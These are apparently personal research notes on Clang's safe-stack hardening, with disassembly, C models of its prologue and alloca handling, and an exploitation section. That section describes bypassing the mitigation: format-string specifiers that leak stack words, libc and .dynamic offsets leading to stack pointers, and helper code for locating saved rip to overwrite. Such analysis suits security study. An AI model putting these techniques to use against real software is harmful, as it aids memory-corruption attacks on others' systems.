yrp604/safe-stack-notes.md

## safe-stack-notes.md

      
Note: I've only briefly read the related CPI paper (PDF); these are just initial impressions after playing around with it a bit.
All the code and binaries I used can be downloaded here. Note that I removed -D_FORTIFY_SOURCE=2 to make the examples a bit simpler.
-fsanitize=safe-stack basically seems to move stack-based buffers off the actual stack, onto another segment of memory (I'll call it the fake stack; the Clang documentation calls it the unsafe stack). The actual stack then stores references to this segment. For example:
char buf[20];
printf("%p\n", buf);
Normally gets turned into something like:
lea    rdi,[rip+0x309]        # "%p\n"
lea    rsi,[rbp-0x20]         # buf
call   810 <printf@plt>
Note the lea rsi, loading the address of the stack based buffer into rsi.
However, with safe-stack this code looks something like:
lea    rdi,[rip+0x103e]        # "%p\n"
mov    rsi,QWORD PTR [rbp-0x50]# buf
call   1680 <printf@plt>
Note that instead of lea we're now dereferencing memory (QWORD PTR...) to get the second argument to printf(3).
In effect, this means that leaking the address of a "stack" based buffer no longer gives us a distance to a saved rip address, because the segment with all our "stack" variables is mapped into memory at a random offset from our actual stack. We can see this happen here (selected instructions from the prolog):
mov    r10,0xffffffffffffffd8
mov    r11,QWORD PTR fs:[r10]
mov    r10,r11
add    r10,0xffffffffffffffe0
mov    QWORD PTR [rbp-0x50],r10
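My reading of those instructions, as a rough C model: 0xffffffffffffffd8 is -0x28 and 0xffffffffffffffe0 is -0x20 in two's complement, so the prologue loads a per-thread pointer from fs:[-0x28], moves it down by 0x20 bytes, and keeps the result as buf. The names below (fake_sp, fake_stack, fake_frame_enter, fake_frame_leave) are made up for illustration, and the write-back of the pointer is an assumption, since it is not among the selected instructions.

```c
#include <assert.h>
#include <stddef.h>

/* Backing storage for this model only; the real segment is mapped by the runtime. */
char fake_stack[4096];

/* Hypothetical stand-in for the slot read at fs:[-0x28]:
   a per-thread pointer to the current top of the fake stack. */
_Thread_local char *fake_sp;

void fake_stack_init(void) {
    fake_sp = fake_stack + sizeof fake_stack;
}

/* Models the prologue excerpt: load the pointer, add -frame_size,
   and hand back the result (stored at [rbp-0x50] in the listing). */
char *fake_frame_enter(size_t frame_size) {
    assert(frame_size <= (size_t)(fake_sp - fake_stack));
    char *frame = fake_sp - frame_size; /* add r10, 0xffffffffffffffe0 */
    fake_sp = frame;                    /* assumed write-back, not in the excerpt */
    return frame;
}

/* Assumed epilogue counterpart: give the space back. */
void fake_frame_leave(size_t frame_size) {
    fake_sp += frame_size;
}
```

Calling fake_stack_init() and then fake_frame_enter(0x20) returns a pointer 0x20 bytes below the previous top, which is the value the real code passes to printf(3) as buf.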
### Exploitation

#### Format Strings

If we're looking at exploiting a binary with safe-stack, we need to leak the address of the actual stack. I'm sure there are a variety of ways to do this, but the first that sprang to mind was to use a format string. On Linux x86_64 the first six arguments are passed via registers, and the rest are spilled onto the stack. This means if we pass a format string such as "%p%p%p%p%p%p%p" (or "%7$p" assuming no _FORTIFY_SOURCE) we'll start to leak actual stack contents. As an added bonus, because all the buffers have been moved off the actual stack, we'll pretty much immediately hit saved registers. From there, these can be clobbered with a write-what-where vulnerability. Additionally, we don't even have to be too careful, as -fsanitize=safe-stack automatically removes -fstack-protector.
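To make the argument counting concrete: printf(3)'s format string itself takes rdi, so the next five variadic arguments come from rsi, rdx, rcx, r8 and r9, and the sixth conversion is the first one read from the stack. Here is a small sketch that builds the positional specifier for a given stack word. The helper name leak_fmt and the constant REGISTER_VARARGS are mine, not from any library.

```c
#include <assert.h>
#include <stdio.h>

/* x86_64 System V: rdi holds the format string, leaving five
   integer registers for printf's variadic arguments. */
enum { REGISTER_VARARGS = 5 };

/* Writes "%N$p" into out, where N selects the stack_slot-th 8-byte
   stack word (0-based) at the printf call site.
   Returns the value returned by snprintf. */
int leak_fmt(char *out, size_t out_len, unsigned stack_slot) {
    assert(out != NULL && out_len > 0);
    return snprintf(out, out_len, "%%%u$p",
                    (unsigned)REGISTER_VARARGS + 1u + stack_slot);
}
```

With stack_slot 0 this produces "%6$p", and with stack_slot 1 it produces "%7$p", the specifier used above.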
#### libc.so.6

libc's .data segment has a pointer to the current executable name, which is stored on the stack. The offsets below are relative to libc.so.6's base address:
+0x3ec0 <program_invocation_short_name>: stack addr
+0x3ec8 <program_invocation_name>:       stack addr

This means from a leaked libc.so.6 pointer, you can pretty easily compute your saved rip location to hit, presuming you have a read primitive.
#### .text

The .dynamic segment of the main executable contains a pointer to libc.so.6's .bss segment. The .bss segment contains the environ variable (as well as others), which points to the stack.
+0xbcf0 <_DYNAMIC+136>: .bss addr

In my case, .bss addr - 0x40 will give you the address of the environ pointer, which you can follow to the stack. Thus, from a leaked .text pointer you should be able to recover the stack.
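The pointer chase is just one subtraction and one read. A sketch under loud assumptions: read64_fn stands for whatever arbitrary-read primitive the bug gives you, the 0x40 offset is only what I saw in my build, and local_read64 is a stand-in that reads the current process so the example can run on its own. All of these names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical arbitrary-read primitive: returns the 8 bytes at addr. */
typedef uint64_t (*read64_fn)(uint64_t addr);

/* Distance from the leaked .bss pointer down to environ (my build only). */
#define ENVIRON_BELOW_BSS_PTR 0x40u

/* POSIX requires programs to declare environ themselves. */
extern char **environ;

/* Follows leaked .bss pointer -> &environ -> environ (a stack address). */
uint64_t stack_ptr_from_bss_leak(read64_fn read64, uint64_t bss_ptr) {
    assert(read64 != NULL);
    uint64_t environ_addr = bss_ptr - ENVIRON_BELOW_BSS_PTR;
    return read64(environ_addr);
}

/* Demo stand-in: "leaks" from our own address space (64-bit only). */
uint64_t local_read64(uint64_t addr) {
    uint64_t value;
    memcpy(&value, (const void *)(uintptr_t)addr, sizeof value);
    return value;
}
```

For example, feeding it (uint64_t)(uintptr_t)&environ + ENVIRON_BELOW_BSS_PTR as the fake leak returns the value of environ. In a real exploit the leaked pointer would come from _DYNAMIC and the read primitive from the vulnerability.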
### Final thoughts

Obviously all these offsets will change, but the basic idea is that there are pointers to the stack all over the place, and if we have read/write primitives and can follow them, we'll likely be able to recover the location of saved rip and overwrite it. If there are no pointers to the stack in a segment we can leak memory from, there are likely pointers to another segment, and we can follow them to recover the relevant details.
Contrary to my initial thoughts, the main benefit of safe-stack doesn't actually appear to be protection of the saved stack registers but instead an informational one. Leaking stack-based memory (via some classes of infoleak) will no longer give an easy path to things like saved registers or __libc_start_main. In this way, it helps strengthen ASLR.
### alloca(3)

Because I was curious, what does alloca(3) look like?
char *buf;
buf = alloca(strtoul(argv[1], NULL, 0));
printf("%p\n", buf);
call   401010 <strtoul@plt>
mov    rsi,0xffffffffffffffd8
mov    rdi,QWORD PTR fs:[rsi]
sub    rdi,rax
mov    rax,rdi
and    rax,0xfffffffffffffff0
mov    QWORD PTR fs:[rsi],rax
mov    QWORD PTR [rbp-0x18],rdi
mov    rsi,QWORD PTR [rbp-0x18]# buf
mov    rdi,QWORD PTR [rbp-0x20]# "%p\n"
call   401020 <printf@plt>
I haven't gone through this in detail, but we see the fake stack's pointer being fetched from thread-local storage (fs:[-0x28]), decremented by the return value of strtoul(3), aligned down to 16 bytes, and stored back. I'm curious how this will work when you have either very large alloca(3) allocations, or adjacent buffers on the fake stack.
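Here is the same sequence as a rough C model, following the listing instruction by instruction. The names fake_stack_ptr and fake_alloca are made up, and fake_stack_ptr is only a stand-in for the slot at fs:[-0x28]. Note that the pointer handed back as buf is the unaligned one (rdi), while the stored pointer is the aligned copy (rax).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the fake stack pointer kept at fs:[-0x28]. */
_Thread_local char *fake_stack_ptr;

/* Models the alloca(3) listing: carve size bytes off the fake stack. */
char *fake_alloca(size_t size) {
    assert(fake_stack_ptr != NULL);
    char *buf = fake_stack_ptr - size;            /* sub rdi, rax */
    uintptr_t aligned =
        (uintptr_t)buf & ~(uintptr_t)0xf;         /* and rax, 0xfffffffffffffff0 */
    fake_stack_ptr = (char *)aligned;             /* mov fs:[rsi], rax */
    return buf;                                   /* mov [rbp-0x18], rdi */
}
```

The listing shows no size check before the subtraction, and the model has none either, so a large enough size simply moves the pointer past the start of whatever region backs the fake stack.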